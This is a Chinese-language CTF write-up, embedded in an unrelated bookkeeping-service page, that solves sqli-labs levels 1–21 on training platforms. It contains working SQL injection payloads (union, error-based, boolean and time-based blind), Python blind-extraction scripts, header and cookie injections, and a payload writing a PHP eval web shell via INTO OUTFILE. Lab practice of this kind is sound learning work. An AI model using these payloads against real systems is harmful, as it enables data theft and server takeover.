您好,欢迎访问代理记账网站
  • 价格透明
  • 信息保密
  • 进度掌控
  • 售后无忧

sqllibs less1-20

文章目录

    • 说明
    • less1
    • less2
    • less3
    • less4
    • less5
    • less6
    • less7
    • less8
    • less9
    • less11
    • less12
    • less17
    • less18
    • less19
    • less20
    • less21

说明

突然发现buuctf上可以直接做sqllibs 有点意思!
最近开始刷sqllibs!!!

less1

从第一题开始
首先从最简单的入手

?id=1'

回显

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

再试下?id=1" 发现正常

?id=1' order by 4%23

报错 说明查询应该有三列

-1' union select 1,2,3%23

回显 2,3
所以接着爆库

-1' union select 1,database(),3%23

爆出security

-1' union select 1,version(),3%23

爆出数据库版本 10.2.26-MariaDB-log

-1' union select 1,group_concat(schema_name),3 from information_schema.schemata%23
-1' union selcet 1,group_concat(table_name),3 from information_schema.tables%23
-1' union select 1,group_concat(column_name),3 from information_schema.columns%23
?id=-1' union select 1,group_concat(column),3 from information_schema.columns where table_schemas='ctftraining' and table_name = 'flag'%23

拿到flag

?id=-1' union select 1, group_concat(flag) ,3 from ctftraining.flag%23

sqlmap学习一下
在这里插入图片描述

less2

-1 union select 1,group_concat(flag),3 from ctftraining.flag%23

less3

$sql = "select * from users where id = ('$id') limit 0,1"

输入1'
看一下报错

check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
select * from users where id = ('1') order by 4%23') limit 0,1

之后就一模一样了
不知为何上面的报错极其诡异

less4

试一下1"
报错

the right syntax to use near '"1"") LIMIT 0,1' at line 1

把上一题的pyload改为 1") ....即可

less5

随便试一试
发现出不来结果了 要开始盲注了!
那就开始吧!

1' and length(database())>8%23

出不来了!
所以判断数据库长度为8

1' and substr(database(),1,1) = 'a'%23
1' and substr((select table_name from information_schema.tables where table_schema = 'ctftraining' limit 0,1),1,1)= 'e'#

手工真的是麻烦。。。
等下贴个脚本

import requests

def determine(text):
    if 'You are' in text:
        return 1
    else:
        return 0


url = "http://95e07679-ca7b-4f20-a702-b6ba38e85ad7.node3.buuoj.cn/Less-5/"

#破解数据库名称
print('---------数据库名---------')
databasename=''

aph = "abcdefghijklmnopqrstuvwxyz"
for i in range(8):
    for j in aph:
        payload = "?id=1' and substr(database(),{},1)='{}'%23".format(i+1,j)
        s = url + payload
        r = requests.get(s)
        if determine(r.text) == 1 :
            databasename += j
            break
print(databasename)
tablename = ""
for i in range(10):
    for j in aph:
        payload = "?id=1' and substr((select table_name from information_schema.tables where table_schema = 'ctftraining' limit 0,1),{},1)='{}'%23".format(i + 1, j)
        s = url + payload
        r = requests.get(s)
        if determine(r.text) == 1 :
            tablename += j
            break
print(tablename)

less6

sqlmap一下看到有两种。。。接下来为了练习· 纯手工

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=1" AND 4328=4328#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1" AND (SELECT 3689 FROM(SELECT COUNT(*),CONCAT(0x717a626b71,(SELECT (ELT(3689=3689,1))),0x717a767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mUPM
?id=1" and length(database())>8%23

和上题一样?
貌似只是单引号变双

less7

题目都说了要用outfile
sqlmap找到注入点

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1') AND 6962=6962 AND ('SJWP'='SJWP

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1') AND (SELECT 9272 FROM (SELECT(SLEEP(5)))TRrJ) AND ('NgRV'='NgRV
   

接下来来脱裤
爆出有哪些数据库

import requests

def determine(text):
    if 'You are' in text:
        return 1
    else:
        return 0

url = "http://f5ce892b-71b8-4a78-ac72-7b6d422c73b9.challenge.ctf.show:8080/"


aph = "abcdefghijklmnopqrstuvwxyz"
schemas = ""
for i in range(100):
    for j in aph:
        payload = "?id=1') AND substr((select group_concat(schema_name) from information_schema.schemata),{},1)='{}' AND ('SJWP'='SJWP".format(i + 1, j)
        s = url + payload
        r = requests.get(s)
        if determine(r.text) == 1 :
            schemas += j
            print(schemas)
            break
for i in range(100):
    for j in aph:
        payload = "?id=1') AND substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),{},1)='{}' AND ('SJWP'='SJWP".format(i + 1, j)
        s = url + payload
        r = requests.get(s)
        if determine(r.text) == 1 :
            schemas += j
            print(schemas)
            break

emmm 稍微改一下 就OK啦
到这里突然发现自己写的脚本极其垃圾。。。大写变小写 下划线 出不来。。。
彻底整改!!!

import requests

def determine(text):
    if 'You are' in text:
        return 1
    else:
        return 0

url = "http://68c4cbfa-6d9e-4ba1-8b45-6ccf70df6a39.challenge.ctf.show:8080/"



schemas = ""
for i in range(100):
    for j in range(65,123):
        payload = "?id=1') AND ord(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),{},1))={} AND ('SJWP'='SJWP".format(i + 1, j)
        s = url + payload
        r = requests.get(s)

        if determine(r.text) == 1 :
            schemas += chr(j)
            print(schemas)
            break

好多了。。。但是貌似FLAG_COLUMN为空。。。
问题又回到了 outfile
往服务器写shell?
所以之前白忙活了(也不算 改进了脚本
outfile的用法

select 'shell' into outfile 'path'

emm 往哪写。。

/var/www/html/1.php

试一下

http://68c4cbfa-6d9e-4ba1-8b45-6ccf70df6a39.challenge.ctf.show:8080/?id=1') AND select '<?php eval($POST_[cmd]); ?>' into outfile 'C:\\var\www\html\1.php' AND ('SJWP'='SJWP

不知为何 死都写不进去
好像是不能在这里执行语句?
应该是 AND 与 AND 中间只能进行判断
换种思路 观察到了 右边应该还有一个来进行闭合 所以何以考虑union注入
猜想应该可以了

?id=1'))  union select '<?php eval($POST_[cmd]); ?>' into outfile 'C:\\var\www\html\1.php'%23

测试一下

?id=1'))  union select 1,2,3%23

可以跑的通 so 稍微改进一下

?id=1'))  union select 1,2, '<?php eval($POST_[cmd]); ?>' into outfile '/tmp/1.php' %23

应该是路径有问题 fuck
或许我应该来查找一下题目的路径?
在mysql 5.6.34版本以后 secure_file_priv的值默认为NULL。并且无法用sql语句对其进行修改

突然发现 tmd 写进去了 但是 会报错。。。日

?id=1'))  UNION SELECT 1,2,'<?php eval($_POST[cmd]);?>' into outfile "/var/www/html/4.php";--+

less8

垃圾sqlmap连注入点都没给我跑出来
简单试了一下

?id=1' union select 1,2,3--+

呃 和普通的盲注没任何其区别呀。。。
接下来就不多说了。。咳咳

less9

简单trytry

?id=1' AND if(length(database())>9,sleep(5),1)%23

sqlmap要指定 technique -T 才能出来payload

Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 3399 FROM (SELECT(SLEEP(5)))AtVH) AND 'QcJu'='QcJu

接下来就开始搞脚本吧!

思路

if(substr(database(),1,1)='s',sleep(5),1)
schemas = ""
for i in range(100):
    for j in range(65,123):
        payload = "?id=1' AND if( ord( substr(database(),{},1) ) = {} ,sleep(3),1)%23".format(i+1,j)
        s = url + payload
        print(s)
        r = requests.get(s)
        if(r.elapsed.seconds) >= 2:
            schemas += chr(j)
            print(schemas)
            break

行倒是行 就是太慢。。。
还容易出错。。。(网络问题
好想会多线程。。。
那就去学。。。

看了salmap运行 猜测sqlmap多线程原理:
先判断需要爆破的长度:
再创造出与之数量对应的线程数?
yes

爆列名 FLAG_COLUMN

tables = ""
for i in range(0,8):
    for j in range(65,123):
        payload = "?id=1' AND if( ord( substr( (select column_name from information_schema.columns where table_schema = 'ctftraining' and table_name = 'FLAG_TABLE' limit 0,1), {},1   )   ) = {} ,sleep(5),1)%23".format(i+1,j)
        s = url + payload
        r = requests.get(s)
        if(r.elapsed.seconds) >= 4:
            tables += chr(j)
            print(tables)
            break

less11

太简单了。。。

less12

试一下最常用的

") and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

接下来就so easy啦

less17

UPDATE 表名称 SET 列名称 = 新值 WHERE 列名称 = 某值

update的注入 想了又想 可以在后面直接进行拼接??

update xxx set password = "123456" where username = "admin"

加上

update xxx set password = "123456" where username = "admin" or 1=1#

那么payload应该长这样

username = " or 1=1#
password = 123456

然而并不行。。。
可恶啊

emmm 换种思路
我们搞password

123456" AND 1=1#

try

1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

emmmm 结果。。。

Data too long for column 'password' at row 8

哎 好像有回显了
再try

1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

ok了
开心
注意 要输入一个正确的用户名才会有回显 不然啥都出不来

less18

可以看出他会把我们的 User Agent 给存下来 然后返回给我们
用了个 sqlmap 结果没成功。。。
估计是 insert
那么 尝试闭合一下 然后直接报错注入? 可

")and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

emmm不行
回想一下

INSERT INTO 表名称 VALUES (值1, 值2,…)
首先得把)闭合了
试一下堆叠注入
emmm 还是不行。。。吐了 问题出在哪呢

");updatexml(1,concat(0x7e,(select database()),0x7e),1)#

可能是思路不对。。。注入点
看一下有几个value。。。

1')%23

额 刚才太急了 现在来分析一下下

check the manual that corresponds to your MariaDB server version for the right syntax to use near '%23', '120.36.51.124', 'admin')' at line 1<br>

终于成功了。。。

1' or updatexml(1,concat(0x7e,database()),0) or '
values( '1 ' or updatexml(1,concat(0x7e,database()),0) or ' ', '120.36.51.124', 'admin')

有趣

less19

和上题一样 换在refer就行了

less20

和上两题不太一样
似乎没有了回显
所以 要好好想想怎么日
sqlmap没跑出来 (可能是我太菜不会用。。。
cao 凭什么buuctf上的less20 就没有回显
ctfshow上的就有回显。。。

在这里插入图片描述
很好 开始分析
emmm 首先他把uname记录了下来 user-agent应该也被存了起来
先试一下 ua头能不能注

直接改ua头 发现永远返回 I love your cookie 有点恶心。。。
突然发现 有两个包 而第二个包应该是决定返回值的!

GET /index.php HTTP/1.1
Host: dbf27bb7-6115-41e0-a267-4b0ef8d362d0.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://burpsuite/
Connection: close
Cookie: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=admin
Upgrade-Insecure-Requests: 1

而这里的cookie带了一个 uname。怪不得sql什么都没跑出来 少给了一个包。。。
这次试一下改第二个包里的ua头
试了一下 这次ua头好像注不了了
so cookie尝试。。。
改一下cookie 发现开始报错了 有戏

Cookie: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=admin'

结束战斗

Cookie: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=admin'+and+updatexml(1,concat(0x7e,(select database()),0x7e),1)+and+'

找到sqlmap的正确打开方式了

Parameter: uname (Cookie)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=admin' AND 8192=8192 AND 'nKOx'='nKOx

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=admin' AND (SELECT 5017 FROM(SELECT COUNT(*),CONCAT(0x71787a6271,(SELECT (ELT(5017=5017,1))),0x716a6a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MBUd'='MBUd

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=admin' OR SLEEP(5) AND 'oQjC'='oQjC

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: UM_distinctid=178bf923ef674-07363e7c62faa1-4c3f237d-144000-178bf923ef76fa; uname=-8022' UNION ALL SELECT NULL,NULL,CONCAT(0x71787a6271,0x4662706a53565a626e576354526f686b44586c635746476e6a784864516e6b48556843596a4e476a,0x716a6a7071)-- -

直接可以爆出来所有信息

less21


分享:

低价透明

统一报价,无隐形消费

金牌服务

一对一专属顾问7*24小时金牌服务

信息保密

个人信息安全有保障

售后无忧

服务出问题客服经理全程跟进